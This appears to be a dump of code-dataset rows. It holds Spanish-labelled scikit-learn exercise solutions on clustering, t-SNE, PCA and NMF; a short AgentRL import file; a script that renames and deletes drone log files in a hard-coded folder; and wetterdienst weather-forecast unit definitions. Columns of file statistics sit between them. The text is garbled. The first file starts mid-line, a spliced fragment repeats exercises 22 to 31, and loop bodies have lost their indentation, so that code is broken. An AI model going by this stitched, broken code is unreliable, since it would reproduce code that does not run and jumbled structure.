dendrogram(mergings, labels = country_names, leaf_rotation = 90, leaf_font_size = 6)
plt.show()
# ===================== #
# ==== Ejercicio 12 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from scipy.cluster.hierarchy import fcluster
# Use fcluster to extract labels: labels
labels = fcluster(mergings, 6, criterion = 'distance')
# Create a DataFrame with labels and varieties as columns: df
df = pd.DataFrame({'labels': labels, 'varieties': varieties})
# Create crosstab: ct
ct = pd.crosstab(df['labels'], df['varieties'])
# Display ct
print(ct)
# ===================== #
# ==== Ejercicio 13 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 200)
# Apply fit_transform to samples: tsne_features
tsne_features = model.fit_transform(samples)
# Select the 0th feature: xs
xs = tsne_features[:,0]
# Select the 1st feature: ys
ys = tsne_features[:,1]
# Scatter plot, coloring by variety_numbers
plt.scatter(xs, ys, c = variety_numbers)
plt.show()
# ===================== #
# ==== Ejercicio 14 === #
# ===================== #
# Import TSNE
from sklearn.manifold import TSNE
# Create a TSNE instance: model
model = TSNE(learning_rate = 50)
# Apply fit_transform to normalized_movements: tsne_features
tsne_features = model.fit_transform(normalized_movements)
# Select the 0th feature: xs
xs = tsne_features[:, 0]
# Select the 1th feature: ys
ys = tsne_features[:, 1]
# Scatter plot
plt.scatter(xs, ys, alpha = 0.5)
# Annotate the points
for x, y, company in zip(xs, ys, companies):
plt.annotate(company, (x, y), fontsize=5, alpha=0.75)
plt.show()
# ===================== #
# ==== Ejercicio 15 === #
# ===================== #
# Perform the necessary imports
import matplotlib.pyplot as plt
from scipy.stats import pearsonr
# Assign the 0th column of grains: width
width = grains[:, 0]
# Assign the 1st column of grains: length
length = grains[:, 1]
# Scatter plot width vs length
plt.scatter(width, length)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation
correlation, pvalue = pearsonr(width, length)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 16 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create PCA instance: model
model = PCA()
# Apply the fit_transform method of model to grains: pca_features
pca_features = model.fit_transform(grains)
# Assign 0th column of pca_features: xs
xs = pca_features[:,0]
# Assign 1st column of pca_features: ys
ys = pca_features[:,1]
# Scatter plot xs vs ys
plt.scatter(xs, ys)
plt.axis('equal')
plt.show()
# Calculate the Pearson correlation of xs and ys
correlation, pvalue = pearsonr(xs, ys)
# Display the correlation
print(correlation)
# ===================== #
# ==== Ejercicio 17 === #
# ===================== #
# Make a scatter plot of the untransformed points
plt.scatter(grains[:,0], grains[:,1])
# Create a PCA instance: model
model = PCA()
# Fit model to points
model.fit(grains)
# Get the mean of the grain samples: mean
mean = model.mean_
# Get the first principal component: first_pc
first_pc = model.components_[0, :]
# Plot first_pc as an arrow, starting at mean
plt.arrow(mean[0], mean[1], first_pc[0], first_pc[1], color = 'red', width = 0.01)
# Keep axes on same scale
plt.axis('equal')
plt.show()
# ===================== #
# ==== Ejercicio 18 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import make_pipeline
import matplotlib.pyplot as plt
# Create scaler: scaler
scaler = StandardScaler()
# Create a PCA instance: pca
pca = PCA()
# Create pipeline: pipeline
pipeline = make_pipeline(scaler, pca)
# Fit the pipeline to 'samples'
pipeline.fit(samples)
# Plot the explained variances
features = range(pca.n_components_)
plt.bar(features, pca.explained_variance_)
plt.xlabel('PCA feature')
plt.ylabel('variance')
plt.xticks(features)
plt.show()
# ===================== #
# ==== Ejercicio 19 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA model with 2 components: pca
pca = PCA(n_components = 2)
# Fit the PCA instance to the scaled samples
pca.fit(scaled_samples)
# Transform the scaled samples: pca_features
pca_features = pca.transform(scaled_samples)
# Print the shape of pca_features
print(pca_features.shape)
# ===================== #
# ==== Ejercicio 20 === #
# ===================== #
# Import TfidfVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
# Create a TfidfVectorizer: tfidf
tfidf = TfidfVectorizer()
# Apply fit_transform to document: csr_mat
csr_mat = tfidf.fit_transform(documents)
# Print result of toarray() method
print(csr_mat.toarray())
# Get the words: words
words = tfidf.get_feature_names()
# Print words
print(words)
# ===================== #
# ==== Ejercicio 21 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import TruncatedSVD
from sklearn.cluster import KMeans
from sklearn.pipeline import make_pipeline
# Create a TruncatedSVD instance: svd
svd = TruncatedSVD(n_components = 50)
# Create a KMeans instance: kmeans
kmeans = KMeans(n_clusters = 6)
# Create a pipeline: pipeline
pipeline = make_pipeline(svd, kmeans)
# ===================== #
# ==== Ejercicio 22 === #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to articles
pipeline.fit(articles)
# Calculate the cluster labels: labels
labels = pipeline.predict(articles)
# Create a DataFrame aligning labels and titles: df
df = pd.DataFrame({'label': labels, 'article': titles})
# Display df sorted by cluster label
print(df.sort_values('label'))
# ===================== #
# ==== Ejercicio 23 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF instance: model
model = NMF(n_components = 6)
# Fit the model to articles
model.fit(articles)
# Transform the articles: nmf_features
nmf_features = model.transform(articles)
# Print the NMF features
print(nmf_features)
# ===================== #
# ==== Ejercicio 24 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a pandas DataFrame: df
df = pd.DataFrame(nmf_features, index = titles)
# Print the row for 'Anne Hathaway'
print(df.loc['Anne Hathaway'])
# Print the row for 'Denzel Washington'
print(df.loc['Denzel Washington'])
# ===================== #
# ==== Ejercicio 25 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: components_df
components_df = pd.DataFrame(model.components_, columns = words)
# Print the shape of the DataFrame
print(components_df.shape)
# Select row 3: component
component = components_df.iloc[3]
# Print result of nlargest
print(component.nlargest())
# ===================== #
# ==== Ejercicio 26 === #
# ===================== #
# Import pyplot
from matplotlib import pyplot as plt
# Select the 0th row: digit
digit = samples[0, :]
# Print digit
print(digit)
# Reshape digit to a 13x8 array: bitmap
bitmap = digit.reshape(13, 8)
# Print bitmap
print(bitmap)
# Use plt.imshow to display bitmap
plt.imshow(bitmap, cmap='gray', interpolation='nearest')
plt.colorbar()
plt.show()
# ===================== #
# ==== Ejercicio 27 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF model: model
model = NMF(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# Assign the 0th row of features: digit_features
digit_features = features[0, :]
# Print digit_features
print(digit_features)
# ===================== #
# ==== Ejercicio 28 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA instance: model
model = PCA(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# ===================== #
# ==== Ejercicio 29 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from sklearn.preprocessing import normalize
# Normalize the NMF features: norm_features
norm_features = normalize(nmf_features)
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = titles)
# Select the row corresponding to 'Cristiano Ronaldo': article
article = df.loc['Cristiano Ronaldo']
# Compute the dot products: similarities
similarities = df.dot(article)
# Display those with the largest cosine similarity
print(similarities.nlargest())
# ===================== #
# ==== Ejercicio 30 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import NMF
from sklearn.preprocessing import Normalizer, MaxAbsScaler
from sklearn.pipeline import make_pipeline
# Create a MaxAbsScaler: scaler
scaler = MaxAbsScaler()
# Create an NMF model: nmf
nmf = NMF(n_components = 20)
# Create a Normalizer: normalizer
normalizer = Normalizer()
# Create a pipeline: pipeline
pipeline = make_pipeline(scaler, nmf, normalizer)
# Apply fit_transform to artists: norm_features
norm_features = pipeline.fit_transform(artists)
# ===================== #
# ==== Ejercicio 31 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = artist_names)
# Select row of 'Bruce Springsteen': artist
artist = df.loc['Bruce Springsteen']
# Compute cosine similarities: similarities
similarities = df.dot(artist)
# Display those with highest cosine similarity
print(similarities.nlargest())=========== #
# ==== Ejercicio 22 === #
# ===================== #
# Import pandas
import pandas as pd
# Fit the pipeline to articles
pipeline.fit(articles)
# Calculate the cluster labels: labels
labels = pipeline.predict(articles)
# Create a DataFrame aligning labels and titles: df
df = pd.DataFrame({'label': labels, 'article': titles})
# Display df sorted by cluster label
print(df.sort_values('label'))
# ===================== #
# ==== Ejercicio 23 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF instance: model
model = NMF(n_components = 6)
# Fit the model to articles
model.fit(articles)
# Transform the articles: nmf_features
nmf_features = model.transform(articles)
# Print the NMF features
print(nmf_features)
# ===================== #
# ==== Ejercicio 24 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a pandas DataFrame: df
df = pd.DataFrame(nmf_features, index = titles)
# Print the row for 'Anne Hathaway'
print(df.loc['Anne Hathaway'])
# Print the row for 'Denzel Washington'
print(df.loc['Denzel Washington'])
# ===================== #
# ==== Ejercicio 25 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: components_df
components_df = pd.DataFrame(model.components_, columns = words)
# Print the shape of the DataFrame
print(components_df.shape)
# Select row 3: component
component = components_df.iloc[3]
# Print result of nlargest
print(component.nlargest())
# ===================== #
# ==== Ejercicio 26 === #
# ===================== #
# Import pyplot
from matplotlib import pyplot as plt
# Select the 0th row: digit
digit = samples[0, :]
# Print digit
print(digit)
# Reshape digit to a 13x8 array: bitmap
bitmap = digit.reshape(13, 8)
# Print bitmap
print(bitmap)
# Use plt.imshow to display bitmap
plt.imshow(bitmap, cmap='gray', interpolation='nearest')
plt.colorbar()
plt.show()
# ===================== #
# ==== Ejercicio 27 === #
# ===================== #
# Import NMF
from sklearn.decomposition import NMF
# Create an NMF model: model
model = NMF(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# Assign the 0th row of features: digit_features
digit_features = features[0, :]
# Print digit_features
print(digit_features)
# ===================== #
# ==== Ejercicio 28 === #
# ===================== #
# Import PCA
from sklearn.decomposition import PCA
# Create a PCA instance: model
model = PCA(n_components = 7)
# Apply fit_transform to samples: features
features = model.fit_transform(samples)
# Call show_as_image on each component
for component in model.components_:
show_as_image(component)
# ===================== #
# ==== Ejercicio 29 === #
# ===================== #
# Perform the necessary imports
import pandas as pd
from sklearn.preprocessing import normalize
# Normalize the NMF features: norm_features
norm_features = normalize(nmf_features)
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = titles)
# Select the row corresponding to 'Cristiano Ronaldo': article
article = df.loc['Cristiano Ronaldo']
# Compute the dot products: similarities
similarities = df.dot(article)
# Display those with the largest cosine similarity
print(similarities.nlargest())
# ===================== #
# ==== Ejercicio 30 === #
# ===================== #
# Perform the necessary imports
from sklearn.decomposition import NMF
from sklearn.preprocessing import Normalizer, MaxAbsScaler
from sklearn.pipeline import make_pipeline
# Create a MaxAbsScaler: scaler
scaler = MaxAbsScaler()
# Create an NMF model: nmf
nmf = NMF(n_components = 20)
# Create a Normalizer: normalizer
normalizer = Normalizer()
# Create a pipeline: pipeline
pipeline = make_pipeline(scaler, nmf, normalizer)
# Apply fit_transform to artists: norm_features
norm_features = pipeline.fit_transform(artists)
# ===================== #
# ==== Ejercicio 31 === #
# ===================== #
# Import pandas
import pandas as pd
# Create a DataFrame: df
df = pd.DataFrame(norm_features, index = artist_names)
# Select row of 'Bruce Springsteen': artist
artist = df.loc['Bruce Springsteen']
# Compute cosine similarities: similarities
similarities = df.dot(artist)
# Display those with highest cosine similarity
print(similarities.nlargest())
| 28.384519
| 112
| 0.654036
| 5,496
| 45,103
| 5.289301
| 0.049309
| 0.019505
| 0.016512
| 0.024149
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.011007
| 0.14795
| 45,103
| 1,588
| 113
| 28.402393
| 0.745433
| 0.499634
| 0
| 0.99842
| 0
| 0
| 0.041426
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.199052
| null | null | 0.099526
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f1180f32f5da4329068a67abe4dca7bb657a822
| 205
|
py
|
Python
|
AgentRL/common/buffers/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/buffers/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
AgentRL/common/buffers/__init__.py
|
hemerson1/AgentRL
|
581727191ba81e1d7f57661511c856bc4c2725ad
|
[
"MIT"
] | null | null | null |
from AgentRL.common.buffers.base import base_buffer
from AgentRL.common.buffers.standard_buffer import standard_replay_buffer
from AgentRL.common.buffers.prioritised_buffer import prioritised_replay_buffer
| 68.333333
| 79
| 0.902439
| 28
| 205
| 6.357143
| 0.357143
| 0.185393
| 0.286517
| 0.404494
| 0.337079
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053659
| 205
| 3
| 79
| 68.333333
| 0.917526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f6dfe7c1f155902ab660683f7a8736beadb04ad
| 10,962
|
py
|
Python
|
publication/Mass_Reformatter.py
|
kianheus/uwb-simulator
|
888cdcae0d4ca101970971afbdf0113ba3bb1480
|
[
"MIT"
] | null | null | null |
publication/Mass_Reformatter.py
|
kianheus/uwb-simulator
|
888cdcae0d4ca101970971afbdf0113ba3bb1480
|
[
"MIT"
] | null | null | null |
publication/Mass_Reformatter.py
|
kianheus/uwb-simulator
|
888cdcae0d4ca101970971afbdf0113ba3bb1480
|
[
"MIT"
] | null | null | null |
import os

# Root folder that holds the "anchors_<Na>_helpers_<N_helpers>" run folders.
# NOTE(review): hard-coded absolute Windows path from the original author's
# machine — adjust before running elsewhere.
publication_folder = os.path.join(
    "C:\\Users\\Kian Heus\\Documents\\GitHub\\uwb-simulator\\publication"
)

# For each helper count, how the letter-suffixed logs (DronePosLogA..H.csv)
# map onto the numeric naming scheme (DronePosLog<i>.csv).  A value of None
# means the file is deleted.  These tables are transcribed verbatim from the
# original hand-written if/rename chains (including the 7-helper mapping,
# which deliberately skips index 4 — preserved as-is).
RENAME_PLAN = {
    7: {"A": 0, "B": 1, "C": 2, "D": 7, "E": 3, "F": 6, "G": 5, "H": None},
    6: {"A": 0, "B": 1, "C": 2, "D": None, "E": 3, "F": 4, "G": 5, "H": None},
    5: {"A": 0, "B": 1, "C": 2, "D": 3, "E": None, "F": None, "G": None, "H": 4},
    4: {"A": None, "B": 0, "C": None, "D": 1, "E": None, "F": 2, "G": None, "H": 3},
    3: {"A": 0, "B": 1, "C": None, "D": None, "E": None, "F": None, "G": None, "H": 2},
    2: {"A": None, "B": None, "C": None, "D": 0, "E": None, "F": None, "G": None, "H": 1},
    1: {"A": None, "B": None, "C": None, "D": 0, "E": None, "F": None, "G": None, "H": None},
    0: {letter: None for letter in "ABCDEFGH"},
}

for run_folder in os.listdir(publication_folder):
    if "anchors_" not in run_folder:
        continue
    print(run_folder)
    # Folder names look like "anchors_<Na>_helpers_<N_helpers>".
    parts = run_folder.split("_")
    Na = int(parts[1])  # anchor count — parsed for reference, not used below
    N_helpers = int(parts[3])
    run_path = os.path.join(publication_folder, run_folder)
    for trajectory in os.listdir(run_path):
        traj_path = os.path.join(run_path, trajectory)
        # Step 1: give every log file a stable letter suffix (A, B, C, ...)
        # based on its listing order.  Skipped for the 8-helper runs, which
        # are left untouched (same guard as the original script).
        if N_helpers != 8:
            for index, log in enumerate(os.listdir(traj_path)):
                if "Log" in log:
                    os.rename(
                        os.path.join(traj_path, log),
                        os.path.join(
                            traj_path, "DronePosLog" + chr(index + 65) + ".csv"
                        ),
                    )
                    print(log)
        # Step 2: map the letter-suffixed logs onto numeric names for this
        # helper count, deleting the surplus files.  Target names never
        # collide with source names (letters vs digits), so the per-letter
        # order of rename/remove does not matter.
        plan = RENAME_PLAN.get(N_helpers)
        if plan is not None:
            for letter, target in plan.items():
                src = os.path.join(traj_path, "DronePosLog" + letter + ".csv")
                if target is None:
                    os.remove(src)
                else:
                    os.rename(
                        src,
                        os.path.join(
                            traj_path, "DronePosLog" + str(target) + ".csv"
                        ),
                    )
| 87
| 125
| 0.644864
| 1,212
| 10,962
| 5.65429
| 0.05363
| 0.135269
| 0.144462
| 0.300306
| 0.942361
| 0.942361
| 0.942361
| 0.942361
| 0.940902
| 0.927769
| 0
| 0.004897
| 0.236271
| 10,962
| 125
| 126
| 87.696
| 0.813665
| 0.015782
| 0
| 0.782609
| 0
| 0
| 0.145308
| 0.004729
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008696
| 0
| 0.008696
| 0.026087
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7e24d4a9124bb82f33339cef9cc471bea503fa84
| 24,175
|
py
|
Python
|
wetterdienst/provider/dwd/forecast/metadata/unit.py
|
waltherg/wetterdienst
|
3c5c63b5b8d3e19511ad789bb499bdaa9b1976d9
|
[
"MIT"
] | null | null | null |
wetterdienst/provider/dwd/forecast/metadata/unit.py
|
waltherg/wetterdienst
|
3c5c63b5b8d3e19511ad789bb499bdaa9b1976d9
|
[
"MIT"
] | null | null | null |
wetterdienst/provider/dwd/forecast/metadata/unit.py
|
waltherg/wetterdienst
|
3c5c63b5b8d3e19511ad789bb499bdaa9b1976d9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
from wetterdienst.metadata.unit import MetricUnit, OriginUnit, UnitEnum
from wetterdienst.util.parameter import DatasetTreeCore
class DwdMosmixUnitOrigin(DatasetTreeCore):
    """Origin units for DWD MOSMIX forecast parameters.

    Each inner class maps the parameter names of one MOSMIX flavour to the
    unit in which DWD publishes the raw value (``OriginUnit``), before any
    conversion.  Member order mirrors the published parameter lists — do not
    reorder.
    """

    class SMALL(UnitEnum):
        """Origin units for the MOSMIX-S (small) parameter set."""

        # -- temperatures (Kelvin) --
        TEMPERATURE_AIR_200 = OriginUnit.DEGREE_KELVIN.value
        TEMPERATURE_DEW_POINT_200 = OriginUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MAX_200 = OriginUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MIN_200 = OriginUnit.DEGREE_KELVIN.value
        # -- wind --
        WIND_DIRECTION = OriginUnit.WIND_DIRECTION.value
        WIND_SPEED = OriginUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_1H = OriginUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_3H = OriginUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_12H = OriginUnit.METER_PER_SECOND.value
        # -- precipitation amounts (kg/m^2) --
        PRECIPITATION_CONSIST_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        # -- weather codes / cloud cover --
        WEATHER_SIGNIFICANT = OriginUnit.SIGNIFICANT_WEATHER.value
        WEATHER_LAST_6H = OriginUnit.DIMENSIONLESS.value
        CLOUD_COVER_TOTAL = OriginUnit.PERCENT.value
        CLOUD_COVER_EFFECTIVE = OriginUnit.PERCENT.value
        CLOUD_COVER_BELOW_500_FT = OriginUnit.PERCENT.value
        CLOUD_COVER_BELOW_1000_FT = OriginUnit.PERCENT.value
        CLOUD_COVER_BETWEEN_2_TO_7_KM = OriginUnit.PERCENT.value
        CLOUD_COVER_ABOVE_7_KM = OriginUnit.PERCENT.value
        # -- surface conditions --
        PRESSURE_AIR_SURFACE_REDUCED = OriginUnit.PASCAL.value
        TEMPERATURE_AIR_005 = OriginUnit.DEGREE_KELVIN.value
        RADIATION_GLOBAL = OriginUnit.GLOBAL_IRRADIANCE.value
        VISIBILITY = OriginUnit.METER.value
        SUNSHINE_DURATION = OriginUnit.SECOND.value
        # -- probabilities (percent) --
        PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_FOG_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_FOG_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_FOG_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = OriginUnit.PERCENT.value

    class LARGE(UnitEnum):
        """Origin units for the MOSMIX-L (large) parameter set.

        Superset of :class:`SMALL` plus additional probability, radiation,
        error-estimate and accumulation parameters.
        """

        # https://opendata.dwd.de/weather/lib/MetElementDefinition.xml
        TEMPERATURE_AIR_200 = OriginUnit.DEGREE_KELVIN.value
        TEMPERATURE_DEW_POINT_200 = OriginUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MAX_200 = OriginUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_MIN_200 = OriginUnit.DEGREE_KELVIN.value
        WIND_DIRECTION = OriginUnit.WIND_DIRECTION.value
        WIND_SPEED = OriginUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_1H = OriginUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_3H = OriginUnit.METER_PER_SECOND.value
        WIND_GUST_MAX_LAST_12H = OriginUnit.METER_PER_SECOND.value
        PRECIPITATION_CONSIST_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_1H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_SNOW_EQUIV_LAST_3H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        WEATHER_SIGNIFICANT = OriginUnit.SIGNIFICANT_WEATHER.value
        WEATHER_LAST_6H = OriginUnit.DIMENSIONLESS.value
        CLOUD_COVER_TOTAL = OriginUnit.PERCENT.value
        CLOUD_COVER_EFFECTIVE = OriginUnit.PERCENT.value
        CLOUD_COVER_BELOW_500_FT = OriginUnit.PERCENT.value
        CLOUD_COVER_BELOW_1000_FT = OriginUnit.PERCENT.value
        CLOUD_COVER_BETWEEN_2_TO_7_KM = OriginUnit.PERCENT.value
        CLOUD_COVER_ABOVE_7_KM = OriginUnit.PERCENT.value
        PRESSURE_AIR_SURFACE_REDUCED = OriginUnit.PASCAL.value
        TEMPERATURE_AIR_005 = OriginUnit.DEGREE_KELVIN.value
        # radiation balances are published in kJ/m^2 (converted in the SI variant)
        RADIATION_SHORT_WAVE_BALANCE_LAST_3H = (
            OriginUnit.KILOJOULE_PER_SQUARE_METER.value
        )
        RADIATION_GLOBAL = OriginUnit.GLOBAL_IRRADIANCE.value
        RADIATION_LONG_WAVE_BALANCE_LAST_3H = (
            OriginUnit.KILOJOULE_PER_SQUARE_METER.value
        )
        VISIBILITY = OriginUnit.METER.value
        SUNSHINE_DURATION = OriginUnit.SECOND.value
        PROBABILITY_WIND_GUST_GE_25_KN_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_40_KN_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_WIND_GUST_GE_55_KN_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_FOG_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_FOG_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_FOG_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_24H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_12H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_5_0_MM_LAST_24H = OriginUnit.PERCENT.value
        # -- parameters exclusive to MOSMIX-L --
        TEMPERATURE_AIR_MIN_005_LAST_12H = OriginUnit.DEGREE_KELVIN.value
        TEMPERATURE_AIR_200_LAST_24H = OriginUnit.DEGREE_KELVIN.value
        PRECIPITATION_DURATION = OriginUnit.SECOND.value
        PROBABILITY_DRIZZLE_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_STRAT_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_CONV_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_THUNDERSTORM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LIQUID_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_SOLID_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_FREEZING_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_VISIBILITY_BELOW_1000_M = OriginUnit.PERCENT.value
        # absolute forecast-error estimates, in the unit of the base parameter
        ERROR_ABSOLUTE_TEMPERATURE_AIR_200 = OriginUnit.DEGREE_KELVIN.value
        ERROR_ABSOLUTE_WIND_SPEED = OriginUnit.METER_PER_SECOND.value
        ERROR_ABSOLUTE_WIND_DIRECTION = OriginUnit.WIND_DIRECTION.value
        ERROR_ABSOLUTE_TEMPERATURE_DEW_POINT_200 = OriginUnit.DEGREE_KELVIN.value
        PRECIPITATION_LAST_6H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PRECIPITATION_CONSIST_LAST_6H = OriginUnit.KILOGRAM_PER_SQUARE_METER.value
        PROBABILITY_PRECIPITATION_GT_0_0_MM_LAST_6H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_1_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_2_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_3_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_5_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_0_7_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_1_0_MM_LAST_1H = OriginUnit.PERCENT.value
        PROBABILITY_PRECIPITATION_GT_2_0_MM_LAST_1H = OriginUnit.PERCENT.value
        SUNSHINE_DURATION_YESTERDAY = OriginUnit.SECOND.value
        SUNSHINE_DURATION_RELATIVE_LAST_24H = OriginUnit.DIMENSIONLESS.value
        PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_0_PCT_LAST_24H = (
            OriginUnit.PERCENT.value
        )
        PROBABILITY_SUNSHINE_DURATION_RELATIVE_GT_30_PCT_LAST_24H = (
            OriginUnit.PERCENT.value
        )
